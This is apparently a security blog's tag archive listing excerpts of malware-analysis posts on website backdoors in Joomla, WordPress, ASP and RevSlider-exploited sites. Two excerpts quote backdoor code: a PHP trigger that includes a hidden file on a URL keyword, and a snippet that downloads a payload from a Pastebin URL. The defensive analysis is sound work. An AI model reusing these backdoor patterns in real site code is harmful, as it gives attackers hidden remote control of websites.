Tag Archives: backdoor

Return of the EXIF PHP Joomla Backdoor

Our Remediation and Research teams are in constant communication and collaboration. It’s how we stay ahead of the latest threats, but it also presents an opportunity to identify interesting threats that aren’t new but may be reoccuring. Such as today’s post, in which we explore a case we shared close to two years ago whereRead More Info »

Malicious Google Search Console Verifications

This past summer we noticed a trend of more and more Blackhat SEO hacks trying to verify additional accounts as owners of compromised sites in Google Search Console (formerly Webmaster Tools). Google Search Console provides really useful information and tools to webmasters who want to: Know how their websites perform in search results. Receive notification about performance, configuration and securityRead More Info »

Wigo Means Bingo for Blackseo Agent

This week my colleague Peter Gramantik showed me a few infected sites that had very similar code embedded in the WordPress index.php files: if (eregi(‘-dbst’,$_SERVER[‘REQUEST_URI’])) { error_reporting(0); include (‘license.txt’); exit(); } The code is very simple. It checks if a page URL has “-dbst” appended to the URL and executes code from an included file. AtRead More Info »

Website Backdoors Leverage the Pastebin Service

We continue our series of posts about hacker attacks that exploit a vulnerability in older versions of the popular RevSlider plugin. In this post we’ll show you a different backdoor variant that abuses the legitimate Pastebin.com service for hosting malicious files. Here’s the backdoor code: if(array_keys($_GET)[0] == ‘up’){ $content = file_get_contents(“http://pastebin . com/raw.php?i=JK5r7NyS”); if($content){unlink(‘evex.php’); $fh2 More Info »

ASP Backdoors? Sure! It’s not just about PHP

I recently came to the realization that it might appear that we’re partial to PHP and WordPress. This realization has brought about an overwhelming need to correct that perception. While they do make up an interesting percentage, there are various other platforms and languages that have similar if not more devastating implications. Take into consideration More Info »

Joomla Plugin Constructor Backdoor

We recently wrote about backdoors in pirated commercial WordPress plugins. This time it will be a short post about an interesting backdoor we found in a Joomla plugin. It was so well organized that at first we didn’t realize there was a backdoor even though we knew something was wrong. Here’s what the code of More Info »